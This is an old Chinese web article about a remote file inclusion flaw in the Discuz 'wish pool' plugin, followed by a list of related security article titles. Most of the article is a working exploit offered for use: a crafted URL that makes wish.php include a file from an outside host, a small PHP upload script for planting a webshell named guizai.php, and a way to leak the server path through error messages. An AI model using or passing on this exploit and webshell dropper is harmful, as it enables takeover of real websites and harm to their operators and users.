discuz許愿池插件遠(yuǎn)程包含漏洞

更新時(shí)間：2006年11月06日 00:00:00 作者：

許愿池插件的wish.php文件出的問(wèn)題：
require $discuz_root.'./include/discuzcode.func.php';

手工利用方法：
遠(yuǎn)程包含漏洞，變量discuz_root過(guò)濾不嚴(yán)，利用方法：
http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt?
不一定非要txt后綴，可以改為任意后綴，后面一定要記得加問(wèn)號(hào)。
這里xxxx.txt用CN.Tink的那個(gè)小馬寫(xiě)個(gè)shell進(jìn)去：
<?copy($_FILES[MyFile][tmp_name],"C:\Inetpub\vhosts\baidu.com\bbs\guizai.php");?>
<form ENCTYPE="multipart/form-data" ACTION="" METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE=" 提交 " TYPE="submit">
</form>
網(wǎng)站物理路徑可以通過(guò)提交http://url/wish.php?discuz_root=http://www.huaidan.org/xxxx.txt ，看錯(cuò)誤提示信息，然后修改xxxx.txt中的路徑即可。 guizai.php就是你上傳的shell的名字。

discuz許愿池插件遠(yuǎn)程包含漏洞

相關(guān)文章

ADSL防御黑客攻擊的十大方法
ADSL防御黑客攻擊的十大方法...
2006-09-09
Iptables防火墻connlimit與time模塊擴(kuò)展匹配規(guī)則
這篇文章主要為大家介紹了Iptables防火墻connlimit與time模塊擴(kuò)展匹配規(guī)則詳解，有需要的朋友可以借鑒參考下，希望能夠有所幫助，祝大家多多進(jìn)步，早日升職加薪
2022-08-08
查找與清除線程插入式木馬
查找與清除線程插入式木馬...
2006-09-09
自己動(dòng)手清除電腦中的木馬程序
這篇文章主要介紹了自己動(dòng)手清除電腦中的木馬程序
2006-09-09
前端面試之對(duì)安全防御的理解分析
這篇文章主要為大家介紹了前端面試之對(duì)安全防御的理解分析，有需要的朋友可以借鑒參考下，希望能夠有所幫助，祝大家多多進(jìn)步，早日升職加薪
2022-09-09
Iptables防火墻string模塊擴(kuò)展匹配規(guī)則
這篇文章主要為大家介紹了Iptables防火墻string模塊擴(kuò)展匹配規(guī)則詳解，有需要的朋友可以借鑒參考下，希望能夠有所幫助，祝大家多多進(jìn)步，早日升職加薪
2022-08-08
前端常見(jiàn)的安全問(wèn)題以及防范措施總結(jié)大全
隨著互聯(lián)網(wǎng)的發(fā)達(dá),各種WEB應(yīng)用也變得越來(lái)越復(fù)雜,滿足了用戶的各種需求,但是隨之而來(lái)的就是各種網(wǎng)絡(luò)安全的問(wèn)題,這篇文章主要給大家介紹了關(guān)于前端常見(jiàn)的安全問(wèn)題以及防范措施的相關(guān)資料,需要的朋友可以參考下
2022-02-02
幾款黑客工具的使用方法
幾款黑客工具的使用方法...
2006-10-10
跨站式腳本(Cross-SiteScripting)XSS攻擊原理分析
XSS又叫CSS (Cross Site Script) ，跨站腳本攻擊。它指的是惡意攻擊者往Web頁(yè)面里插入惡意html代碼，當(dāng)用戶瀏覽該頁(yè)之時(shí)，嵌入其中Web里面的html代碼會(huì)被執(zhí)行，從而達(dá)到惡意用戶的特殊目的。
2008-09-09
滲透中用openrowset搞shell的方法
滲透中用openrowset搞shell的方法...
2006-12-12